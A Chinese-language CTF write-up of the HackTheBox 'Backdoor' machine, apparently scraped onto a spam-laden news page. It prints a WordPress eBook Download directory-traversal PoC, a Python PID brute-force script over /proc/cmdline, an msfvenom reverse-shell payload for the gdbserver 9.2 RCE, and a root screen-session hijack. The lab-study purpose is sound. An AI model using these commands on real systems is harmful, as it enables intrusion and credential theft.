当前位置: 首页 > news >正文

免费网站模版建设上海自贸区注册公司的条件

免费网站模版建设,上海自贸区注册公司的条件,页面做的比较炫酷的网站,做搜狗网站优化点击软Backdoor Enumeration nmap 第一次扫描发现系统对外开放了22#xff0c;80和1337端口#xff0c;端口详细信息如下 22端口对应的是ssh服务#xff0c;80端口使用Apache#xff0c;title上写着backdoor#xff0c;而且可以看出使用了wordpress#xff0c;1337端口暂时还…Backdoor Enumeration nmap 第一次扫描发现系统对外开放了2280和1337端口端口详细信息如下 22端口对应的是ssh服务80端口使用Apachetitle上写着backdoor而且可以看出使用了wordpress1337端口暂时还不能确定 TCP/80 访问页面经典的wordpress风格一访问页面就可以看到页面四个链接分别是homeaboutblogcontact点击home跳转失败显示无法识别域名backdoor.htb需要将其添加到/etc/hosts中。剩下三个也只能看到一些基础信息没什么好玩的 配置完成能够解析域名后访问该链接但是并没有发现什么可以利用的东西 可以尝试枚举一些目录wordpress默认的插件安装目录是/wp-content/plugins 可以看到默认的index.php目录已经被删除可以看到该目录下只有一个电子书下载的插件和一个hello.php在电子书下载插件目录中有一个readme文档其中揭露了插件的版本为1.1 Exploitation WordPress Plugin eBook Download 1.1 - Directory Traversal 在知道了一些基本信息后可以搜索相关内容看看是否存在已知的漏洞可以直接拿来利用 该目录遍历漏洞详情如下可以看到我们需要能够访问filedownload.php文件而在wp-content目录下确实有这个php文件然后利用目录遍历去请求wp-config.php文件从该文件的名字也能看出来其中包含了很多配置信息 # Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal # Exploit Author: Wadeek # Website Author: https://github.com/Wad-Deek # Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip # Version: 1.1 # Tested on: Xampp on Windows7[Version Disclosure]http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt [PoC]/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl../../../wp-config.php按照上文Poc读取指定文件然后在其中发现了一些有关数据库的凭据信息 有了一个密码又存在LFI考虑读取/etc/passwd内容然后看某个用户能否使用数据库密码登录有一个user用户但是并不能成功登录ssh /proc/{PID}/cmdline 在最开始发现系统还对外开放了1337端口但是这个端口使用curlncattelnet等方式均无法访问因为存在LFI可以读取远程主机中关于1337端口对应服务的信息 需要使用暴力破解/proc/{pid}/cmdline文件的方式来实现在linux中该文件用于显示运行对应PID进程时的命令可以先运行一个tcpdump程序使用ps -aux | grep tcpdump命令来查看相应程序的pid最后查看/proc/{pid}/cmdline文件现实的就是运行tcpdump的命令 运行tcpdump程序后查看相应程序的pid 将获取到的pid填入对应位置查看15806得到结果如下显示了执行时的命令 Brute Force PID 现在我们可以尝试利用burpsuite的暴力破解来看看1337端口到底在运行什么服务通过简单测试发现可行那么只需要将请求包发送给intruder然后检索1-1000的内容 也可以写python脚本来爆破写一个pid的循环然后请求url最后打印输出 import requests from bs4 import BeautifulSoupfor i in range(1,1000):url http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl/proc/str(i)/cmdlinereq requests.get(url)print(req.text.replace(scriptwindow.close()/script,)) 经过漫长的暴力破解最终在pid为852的进程中看到了1337端口运行着gdbserver GDB是GNU项目的调试器是一种调试工具gdbserver是可以远程运行GDB的一个应用程序搜索发现gdbserver 9.2版本存在rce漏洞 GNU gdbserver 9.2 - Remote Command Execution (RCE) 虽然暂时无法确定目标系统使用的版本但是值得一试 msfvenom -p linux/x64/shell_reverse_tcp LHOST10.10.14.11 LPORT4444 PrependForktrue -orev.bin在本地监听4444端口然后执行指令即可得到shell Privilege Escalation 之前得到的密码也没起到什么作用但是之前在爆破pid时还发现pid为850的进程是root运行的可以看看是什么 screen是一个类似于tmux的终端多路复用器可用于启动会话然后在该会话内打开任意数量的虚拟终端即使窗口不可见或者断开链接在screen中运行的进程也将继续运行会话分离时最初从屏幕启动的进程仍在运行并由本身管理。 screen -dmS root意味着screen会话以分离模式启动该会话被命名为“root”当创建新的屏幕会话时会在/var/run/screen位置创建一个新目录名称为s-{username}在此目录中使用屏幕会话名称创建屏幕会话文件可以使用用户dotguy在本地创建一个屏幕会话名称为test_session 用于附加到为不同用户创建的屏幕会话的默认屏幕语法是screen -x user/session_name 但是提示需要添加终端类型可以输入以下指令 export TERMxterm screen -x root/root
http://www.pierceye.com/news/529148/

相关文章:

  • 做淘宝券推广的网站有哪些石碣镇做网站
  • 贵阳网站制作免费桂林市工程建设项目招标网站
  • 南昌专业网站排名推广做网站编辑我能力得到提升
  • 网站建设行业凡科建站登录入口官方正版
  • 一般网站开发的硬件要求视觉冲击力的网站设计
  • 昆明做网站建设的公司哪家好广西建设培训网
  • 国字类型网站有哪些内容百度seo分析工具
  • 免费浪漫网页制作网站html的常用标签
  • 上行10m做网站服务仿简书wordpress博客主题
  • 网站建设中网页代码做网站的是不是程序员
  • 做网站需要的技术做网站优化好的网络公司
  • 为什么要更新网站登录四川省住房和城乡建设厅官网
  • 注册网站不用手机短信验证的网站营销型网站的建设起步
  • 国内高清图片素材网站推荐元素领域wordpress
  • 沙朗做网站公司网页制作免费网站制作
  • 营销型网站重要特点是网站播放视频速度优化
  • 建设厅报名网站做PHP网站前端网站进不去
  • 网站开发后台 amp建网页还是网站
  • 云南个旧建设局网站宁波关键词优化品牌
  • 网站建设方案应急处置wordpress我爱水煮鱼
  • 网页设计模板html代码班级主题广东seo推广
  • 西安 网站托管西安网站关键词排名
  • 做网站用discuz还是wp汉狮做网站公司郑州
  • 网站运营服务中心建设方案网页免费制作网站
  • 做网站销售有前景怎么注销网站
  • 福州建设网站设计电子商务网站平台有哪些
  • 扁平化色块风格的网站企业网站建设客户需求调查问卷
  • 网站建设产品服务痘痘如何去除效果好
  • 展会电子商务网站如何建设单页网站如何做
  • 济南软件外包邢台seo服务公司